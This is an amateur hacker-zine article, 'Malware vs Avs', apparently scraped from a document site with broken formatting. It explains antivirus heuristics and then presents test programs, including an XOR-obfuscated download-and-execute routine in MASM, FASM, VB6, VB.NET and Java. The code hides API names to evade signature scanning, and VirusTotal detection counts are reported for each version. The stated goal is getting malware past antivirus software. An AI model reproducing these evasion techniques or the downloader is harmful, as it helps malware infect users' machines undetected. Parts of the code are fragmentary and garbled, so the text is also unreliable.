Professional Documents
Culture Documents
___
/\\,/\\, ,, - -_,
/| || || _ ||; _ ; ( ~/|| ;
|| || || < \,||\\/\/\ < \,,._-__-_ \\/\ _-_,( / || \\/\ _-_,
||=|= || /-|||||| | | /-|| || || \\|| |||_. \/==|| || |||_.
~|| || ||(( |||||| | |(( || || ||/ || | ~ || /_ _|| || | ~ ||
|, \\,\\,\/\\\\\\/\\/ \/\\ \\,\\,/ \\/ , -_- ( - \\,\\/ , -_-
_-
------------------------][Malware vs Avs][---------------------
0x00 - Index
0x10 - Intro
0x20 - Avs
0x30 - Malware
0x40 - Avs Techniques
0x50 - Malware Techniques
0x60 - Examples
0x70 - Conclusion
0x80 - Credits/References
For the final, i will show you some piratical examples of some basic
malware applications, written in the main programing languages available today (ASM,
C/C++ Visual Basic 6/.NET, JAVA), and see why a antivirus detects our app, or
don't detect it =).
+ ------------------------------------ +
Heuristic was made because, with the increasing number of malware creations,
according to F-Secure, in 2007 the malware creations exceeded all malware creations
of 20 years behind, all together. In 1995, malware was taking the control over
antivirus software. Antivirus companies react with heuristic technology.
- variable/memory emulator;
- parser;
- flow analyzer;
- code analyzer;
- disassembler/emulator;
- weight-based system and/or rule based system.
There are two types of scanning, signature scaning and heuristic scaning.
Signature scanning, this type of scanning searches for certain sequence of bytes,
that exists in common malware, like "*.exe", windows apis, and others.
Heuristic scanning, this type of scanning is a lot more advanced them the last one,
heuristic scanning searches for instructions or commands within a program that are not
found in typical applications.
There are some characteristics that can make malware detected by antivirus,
and this characteristics are:
[Characteristics]
-Executable
- Incorrect timestamp;
- Entrypoint
- Entrypoint location, if the entrypoint isn't in the frist section;
- PE HEADER Data
- PE Header Location;
- Incorrect SizeOfImage;
- Incorrect SizeOfCode;
- PE Header incorrect parameters;
- Sections characteristics
- If the last section is exectubale;
- If the frist section is writable;
- Number of sections
- Executable have only one section;
- Section Names
- Unknown section name;
- Empty section name;
- Code
- Different from the standards, of the language;
- Code Redirections;
- Long Loops/Jumps;
File: /home/juza/Desktop/Malware vs Avs v1 Page 3 of 13
- Suspicious Strings
- "*.exe";
- "CreateRemoteThread";
- etc;
- etc...
[Emulation]
Each one of these characteristics has one determined weight, the set of the addition
of all the weights, will indicate if is a malware, or not.
In short the heuristic is a very powerful technology, but it have some imperfections,
heuristic can make False Positives, example, a program who was design to format hard disk,
defrag disks, etc..., some antivirus will tell that this program is malware, or it's infected.
Now, after all this, how can malware bypass all this system called heuristic. Nowadays
malware also use advanced techniques to avoid detection by antivirus, and this Techniques are:
These are the main techniques to avoid heuristic emulation. Just Remember, you application
must be like some other normal application.
In this section we will build some basic programs, only for test the reactions of avs,
first of all, we will create a simple program to show a messagebox and exit, just for see the
reactions.
MASM.
.386
.model flat, stdcall
option casemap:none
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
.data
_szMessage db "Juza", 0h
_szText db "The Puppet Master", 0h
.code
start:
push 0
push offset _szMessage
push offset _szText
push 0
call MessageBoxA
push 0
call ExitProcess
end start
Result : hxxp://www.virustotal.com/pt/analisis/1a00...31746fc0e0f1057
One Av Prevx1, tells me that the code above is a Cloaked Malware, ummmm, very interesting, lol.
include 'win32a.inc'
push MB_OK
push _caption
push _message
push NULL
call [MessageBox]
File: /home/juza/Desktop/Malware vs Avs v1 Page 5 of 13
push 0
call [ExitProcess]
library user,'USER32.dll',\
kernel, 'KERNEL32.DLL'
import user,\
MessageBox,'MessageBoxA'
import kernel,\
ExitProcess, 'ExitProcess'
Result: hxxp://www.virustotal.com/pt/analisis/83b9...e57f99cdade57db
And now the most interesting think, 5 avs detects a a potential virus, and just for
a simple messagebox.
#include <windows.h>
#ifndef null
#define null 0
#endif
Result: hxxp://www.virustotal.com/pt/analisis/fbfd...c15fdeef60c2fd5
Result: hxxp://www.virustotal.com/pt/analisis/0f76...40ab9d00c52d28c
ByVal e As System.EventArgs) _
Handles MyBase.Load
MessageBox.Show("Juza", "Juza", MessageBoxButtons.OK)
End Sub
End Class
Result: hxxp://www.virustotal.com/pt/analisis/6c13...b75f1970099c5b5
Nothing.
import javax.swing.JApplet;
import javax.swing.JFrame;
import javax.swing.JOptionPane;
Result: hxxp://www.virustotal.com/analisis/f418982...016d9f5f9d1b6df
As i think, nothing.
With this results, we can make a simple conclusion, the majority of all avs, have more
easiness, to detect something strange on native win32 applications, the same avs that detect, something
strange on the ASM messagebox (MASM,FASM), don't detect nothing on the framework based languages,
VB.NET and JAVA, so we can conclude for now, that avs have difficulty on emulation of JAVA and .NET
based applications.
Now i will finish the tests, with something simple, but is something that every malware coder
programmed before, i will test the avs with a simple Downloader, just for see the reactions.
In the case of non-framework based applications, we will have just one Api, the rest will be
loaded, and a simple encrypt function, to prevent signature scan.
MASM.
.386
.model flat, stdcall
option casemap:none
include kernel32.inc
include shell32.inc
includelib kernel32.lib
includelib shell32.lib
.data
;http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
_szDownload db ".226|ii2.#h#'42.h*/i85!2'2.'+i6322?i*'2#52i>~pi6322?h#>#", 0h;70
_szDll db "Afxy{z:pxx", 0h;20
_szFunc db "}zdlG_FDGIL|GnADMi", 0h;40
_szSp db "a8^rwvv{,gzg", 0h;2
_dwHDll dd 0h
File: /home/juza/Desktop/Malware vs Avs v1 Page 7 of 13
_dwHFunc dd 0h
.code
start:
@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 20
add eax, 1
jmp @B
@@:
@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 40
add eax, 1
jmp @B
@@:
@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 70
add eax, 1
jmp @B
@@:
@@:
cmp byte ptr [eax], 0h
je @F
xor byte ptr [eax], 2
add eax, 1
jmp @B
@@:
push 0h
push 0h
push offset _szSp
push offset _szDownload
push 0h
call eax
push 5;SW_SHOW
push 0
File: /home/juza/Desktop/Malware vs Avs v1 Page 8 of 13
push 0
push offset _szSp
push 0
push 0
call ShellExecute
push 0
call ExitProcess
end start
Result: hxxp://www.virustotal.com/pt/analisis/b1f2...a734d9f65375736
Umm, this a result that i not expected, just 4 avs, and the best ones don't detect
(Kaspersky, Nod32).
include 'win32a.inc'
_dwHDll dd 0h
_dwHFunc dd 0h
@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 20
add eax, 1
jmp @B
@@:
push _szDll
call [LoadLibrary]
@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 40
add eax, 1
jmp @B
@@:
push _szFunc
push [_dwHFunc]
call [GetProcAddress]
@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 70
add eax, 1
jmp @B
@@:
@@:
cmp byte [eax], 0h
je @F
xor byte [eax], 2
add eax, 1
jmp @B
@@:
push 0h
push 0h
push _szSp
push _szDownload
push 0h
call eax
push 5;SW_SHOW
push 0
push 0
push _szSp
push 0
push 0
call [ShellExecute]
push 0
call [ExitProcess]
library shell,'SHELL32.DLL',\
kernel, 'KERNEL32.DLL'
import kernel,\
GetProcAddress, 'GetProcAddress',\
LoadLibrary, 'LoadLibraryA',\
ExitProcess, 'ExitProcess'
import shell,\
ShellExecute, 'ShellExecuteA'
Result: hxxp://www.virustotal.com/pt/analisis/44d2...9f51e1b46fb916a
h#>#", 70), _
decript("a8^rwvv{,gzg", 2), &H0, &H0
Shell decript("a8^rwvv{,gzg", 2)
Unload me
End Sub
For i = 1 To Len(szStr)
szChar = Mid(szStr, i, 1)
a = intVal Xor Asc(szChar)
szChar = Chr(a)
szDump = szDump & szChar
Next i
decript = szDump
End Function
</font><font face="Courier New">
Result: hxxp://www.virustotal.com/pt/analisis/9f89a47f99d0e8c70320cd6335267d86
Visual Basic.Net
Imports System.IO
Imports System.Net
Imports System.Text
Shell(decript("a8^rwvv{,gzg", 2))
Me.Close()
End Sub
File: /home/juza/Desktop/Malware vs Avs v1 Page 11 of 13
For i = 1 To Len(szStr)
szChar = Mid(szStr, i, 1)
a = intVal Xor Asc(szChar)
szChar = Chr(a)
szDump = szDump & szChar
Next i
decript = szDump
End Function
End Class
Result: hxxp://www.virustotal.com/pt/analisis/e5e3ab6de021d6d81570ce71f0539569
JAVA
import java.io.*;
import java.net.*;
import java.util.concurrent.Executor;
} else {
System.err.println("Could not figure out local file name
for " +
address);
}
}
Result: hxxp://www.virustotal.com/analisis/a7cb0fb...4d620aebd4e11bd
Nothing, as i expect.
Frist of all, Sorry for i don't complete the code, but i have alot of
work, if i win, i will finish it lol =), just kiding.
The more similarities your malware have to a normal application, will be the key to avoid
antivirus detection, making avs think that is a normal application.
[References]
[1] Peering Inside the PE: A Tour of the Win32 Portable Executable File Format
- hxxp://msdn.microsoft.com/en-us/magazine/ms809762.aspx
- hxxp://www.securityfocus.com/infocus/1542
[9] Juza
- Brain
[Credits]